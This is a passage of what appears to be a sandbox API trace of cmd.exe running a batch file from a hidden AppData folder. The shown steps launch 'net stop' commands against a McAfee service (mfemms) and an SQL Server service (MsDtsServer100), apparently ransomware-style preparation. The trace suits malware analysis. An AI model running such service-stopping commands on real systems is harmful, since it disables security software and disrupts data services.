lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0214.899] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.900] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.900] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0214.900] SetErrorMode (uMode=0x0) returned 0x1 [0214.900] GetProcessHeap () returned 0x3e0000 [0214.900] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0214.900] GetProcessHeap () returned 0x3e0000 [0214.900] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0214.901] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.901] GetProcessHeap () returned 0x3e0000 [0214.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0214.901] GetProcessHeap () returned 0x3e0000 [0214.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0214.901] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0214.901] GetProcessHeap () returned 0x3e0000 [0214.901] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0214.901] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.901] GetProcessHeap () returned 0x3e0000 [0214.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0214.902] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0214.902] GetProcessHeap () returned 0x3e0000 [0214.902] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0214.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.903] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.903] GetLastError () returned 0x2 [0214.903] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.903] GetLastError () returned 0x2 [0214.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.904] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0214.904] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.904] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.905] GetLastError () returned 0x2 [0214.905] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0214.905] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.905] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.906] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0214.906] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0214.906] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0214.906] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.906] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop mfemms /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop mfemms /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop mfemms /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xba8, dwThreadId=0xb94)) returned 1 [0214.910] CloseHandle (hObject=0x74) returned 1 [0214.910] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.910] GetProcessHeap () returned 0x3e0000 [0214.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.910] GetEnvironmentStringsW () returned 0x3f8408* [0214.910] GetProcessHeap () returned 0x3e0000 [0214.910] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.911] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.911] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0215.035] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0215.035] CloseHandle (hObject=0x78) returned 1 [0215.035] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0215.035] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0215.035] GetProcessHeap () returned 0x3e0000 [0215.035] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.035] GetEnvironmentStringsW () returned 0x3f8408* [0215.035] GetProcessHeap () returned 0x3e0000 [0215.035] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.036] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.036] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0215.036] GetProcessHeap () returned 0x3e0000 [0215.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.036] GetEnvironmentStringsW () returned 0x3f8408* [0215.036] GetProcessHeap () returned 0x3e0000 [0215.036] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.036] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.036] GetProcessHeap () returned 0x3e0000 [0215.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0215.036] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0215.036] _get_osfhandle (_FileHandle=1) returned 0x264 [0215.036] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0215.036] _get_osfhandle (_FileHandle=1) returned 0x264 [0215.036] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0215.036] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0215.036] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0215.037] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0215.037] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0215.037] SetConsoleInputExeNameW () returned 0x1 [0215.037] GetConsoleOutputCP () returned 0x1b5 [0215.037] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0215.037] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.037] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0215.038] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0215.038] _get_osfhandle (_FileHandle=3) returned 0x78 [0215.038] SetFilePointer (in: hFile=0x78, lDistanceToMove=5563, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15bb [0215.038] GetProcessHeap () returned 0x3e0000 [0215.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0215.038] GetProcessHeap () returned 0x3e0000 [0215.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0215.038] GetProcessHeap () returned 0x3e0000 [0215.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0215.038] GetProcessHeap () returned 0x3e0000 [0215.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0215.038] GetProcessHeap () returned 0x3e0000 [0215.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0215.038] GetProcessHeap () returned 0x3e0000 [0215.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0215.038] GetProcessHeap () returned 0x3e0000 [0215.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0215.038] GetProcessHeap () returned 0x3e0000 [0215.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0215.038] GetProcessHeap () returned 0x3e0000 [0215.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0215.038] GetProcessHeap () returned 0x3e0000 [0215.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0215.038] GetProcessHeap () returned 0x3e0000 [0215.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0215.038] GetProcessHeap () returned 0x3e0000 [0215.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0215.038] GetProcessHeap () returned 0x3e0000 [0215.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0215.038] _get_osfhandle (_FileHandle=3) returned 0x78 [0215.038] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15bb [0215.038] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x306, lpOverlapped=0x0) returned 1 [0215.038] SetFilePointer (in: hFile=0x78, lDistanceToMove=5591, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15d7 [0215.039] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=28, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MsDtsServer100 /y\r\ny\r\n/y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 28 [0215.039] _get_osfhandle (_FileHandle=3) returned 0x78 [0215.039] GetFileType (hFile=0x78) returned 0x1 [0215.039] _get_osfhandle (_FileHandle=3) returned 0x78 [0215.039] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15d7 [0215.039] GetProcessHeap () returned 0x3e0000 [0215.039] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0215.039] GetProcessHeap () returned 0x3e0000 [0215.039] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0215.043] _tell (_FileHandle=3) returned 5591 [0215.043] _close (_FileHandle=3) returned 0 [0215.043] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0215.043] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0215.043] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0215.043] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0215.043] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0215.043] _wcsicmp (_String1="net", _String2="CD") returned 11 [0215.043] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0215.043] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0215.043] _wcsicmp (_String1="net", _String2="REN") returned -4 [0215.043] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0215.043] _wcsicmp (_String1="net", _String2="SET") returned -5 [0215.043] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0215.043] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0215.043] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0215.043] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0215.043] _wcsicmp (_String1="net", _String2="MD") returned 1 [0215.043] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0215.043] _wcsicmp (_String1="net", _String2="RD") returned -4 [0215.043] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0215.043] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0215.043] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0215.043] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0215.043] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0215.043] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0215.043] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0215.043] _wcsicmp (_String1="net", _String2="VER") returned -8 [0215.043] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0215.043] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0215.043] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0215.043] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0215.043] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0215.043] _wcsicmp (_String1="net", _String2="START") returned -5 [0215.043] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0215.044] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0215.044] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0215.044] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0215.044] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0215.044] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0215.044] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0215.044] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0215.044] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0215.044] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0215.044] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0215.044] SetErrorMode (uMode=0x0) returned 0x1 [0215.044] GetProcessHeap () returned 0x3e0000 [0215.044] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0215.044] GetProcessHeap () returned 0x3e0000 [0215.044] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0215.045] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.045] GetProcessHeap () returned 0x3e0000 [0215.045] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0215.045] GetProcessHeap () returned 0x3e0000 [0215.045] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0215.045] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0215.045] GetProcessHeap () returned 0x3e0000 [0215.045] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0215.045] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.045] GetProcessHeap () returned 0x3e0000 [0215.045] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0215.046] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0215.046] GetProcessHeap () returned 0x3e0000 [0215.046] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0215.046] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.046] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.047] GetLastError () returned 0x2 [0215.047] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.047] GetLastError () returned 0x2 [0215.047] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.048] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0215.048] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.049] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.049] GetLastError () returned 0x2 [0215.049] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0215.049] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.050] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.050] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0215.050] SetErrorMode (uMode=0x0) returned 0x1 [0215.050] GetProcessHeap () returned 0x3e0000 [0215.050] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0215.050] GetProcessHeap () returned 0x3e0000 [0215.050] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0215.051] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.051] GetProcessHeap () returned 0x3e0000 [0215.051] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0215.051] GetProcessHeap () returned 0x3e0000 [0215.051] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0215.051] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0215.051] GetProcessHeap () returned 0x3e0000 [0215.051] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0215.051] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.051] GetProcessHeap () returned 0x3e0000 [0215.051] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0215.052] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0215.052] GetProcessHeap () returned 0x3e0000 [0215.052] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0215.052] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.052] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.052] GetLastError () returned 0x2 [0215.053] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.053] GetLastError () returned 0x2 [0215.053] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.054] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0215.054] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0215.054] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.054] GetLastError () returned 0x2 [0215.055] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0215.055] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0215.055] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.055] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0215.055] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0215.056] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0215.056] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0215.056] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MsDtsServer100 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MsDtsServer100 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MsDtsServer100 /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x40c, dwThreadId=0x980)) returned 1 [0215.060] CloseHandle (hObject=0x78) returned 1 [0215.060] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0215.060] GetProcessHeap () returned 0x3e0000 [0215.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.060] GetEnvironmentStringsW () returned 0x3f8408* [0215.060] GetProcessHeap () returned 0x3e0000 [0215.060] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.060] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.060] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0215.192] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0215.192] CloseHandle (hObject=0x74) returned 1 [0215.192] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0215.192] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 